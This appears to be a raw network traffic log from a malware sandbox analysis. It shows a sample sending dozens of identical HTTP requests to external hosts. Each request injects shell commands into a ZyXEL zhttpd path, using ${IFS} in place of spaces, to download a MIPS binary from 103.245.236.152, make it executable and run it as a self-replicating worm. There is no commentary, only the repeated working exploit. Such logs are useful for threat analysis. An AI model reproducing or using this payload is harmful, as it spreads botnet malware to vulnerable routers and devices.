                                      Jan 14, 2024 15:50:43.222785950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3529192.168.2.1457900119.125.235.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222829103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3530192.168.2.1448686110.251.147.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222860098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3531192.168.2.144327286.102.156.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222906113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3532192.168.2.1450876118.187.139.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222946882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3533192.168.2.144690853.16.72.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222986937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3534192.168.2.1445826169.3.85.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223043919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3535192.168.2.1439362105.181.168.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223120928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3536192.168.2.1449432160.209.126.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223185062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3537192.168.2.144555239.46.179.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223234892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3538192.168.2.1447604198.68.151.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223265886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3539192.168.2.145492449.137.53.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223329067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3540192.168.2.143806693.103.29.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223364115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3541192.168.2.1448176191.113.92.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223416090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3542192.168.2.1443260220.238.130.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223463058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3543192.168.2.1439318165.243.105.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223507881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3544192.168.2.1435328112.141.181.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223553896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3545192.168.2.1436070189.184.224.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223599911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3546192.168.2.144968437.201.197.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223670959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3547192.168.2.1440638123.252.202.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223711014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3548192.168.2.1441552106.187.210.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223761082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3549192.168.2.143934446.157.85.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223838091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3550192.168.2.144587846.178.195.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223870039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3551192.168.2.1437902176.40.55.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223926067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3552192.168.2.143315661.79.156.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.223973036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3553192.168.2.144897699.28.219.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224047899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3554192.168.2.1440756102.153.64.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224127054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3555192.168.2.143914463.165.228.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224158049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3556192.168.2.1438524150.76.163.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224224091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3557192.168.2.1435356201.10.180.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224267006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3558192.168.2.1436362185.228.226.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224335909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3559192.168.2.143831677.115.35.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224396944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3560192.168.2.1450500110.183.101.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224461079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3561192.168.2.1459026181.95.33.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224493980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3562192.168.2.144747617.241.12.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224558115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3563192.168.2.1447036139.6.123.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224603891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3564192.168.2.145468075.236.76.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224644899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3565192.168.2.1446922105.148.192.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224711895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3566192.168.2.144851267.132.47.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224771976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3567192.168.2.1459524222.221.204.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224808931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3568192.168.2.1447942169.105.140.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224873066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3569192.168.2.144349438.40.237.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224940062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3570192.168.2.1455316175.200.110.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.224987030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3571192.168.2.1456116172.71.245.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225016117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3572192.168.2.145220814.159.132.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225059986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3573192.168.2.144435847.196.39.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225112915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3574192.168.2.1447730190.154.82.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225171089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3575192.168.2.1458980180.214.114.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225241899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3576192.168.2.144695266.122.205.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225315094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3577192.168.2.144420277.133.59.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225372076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3578192.168.2.1457842175.52.218.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225410938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3579192.168.2.143414650.89.95.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225465059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3580192.168.2.143800446.37.248.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225519896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3581192.168.2.14450441.216.192.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225589037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3582192.168.2.144794836.106.127.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225641012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3583192.168.2.145102472.96.110.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225682974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3584192.168.2.1438908125.136.0.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225753069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3585192.168.2.1443412180.16.9.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225790977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3586192.168.2.145979289.235.91.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225871086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3587192.168.2.1458172163.125.197.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225892067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3588192.168.2.145875438.108.238.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225946903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3589192.168.2.1457866149.16.8.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.225997925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3590192.168.2.145013094.64.102.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.226047993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3591192.168.2.145967419.196.145.122443
                                      TimestampBytes transferredDirectionData
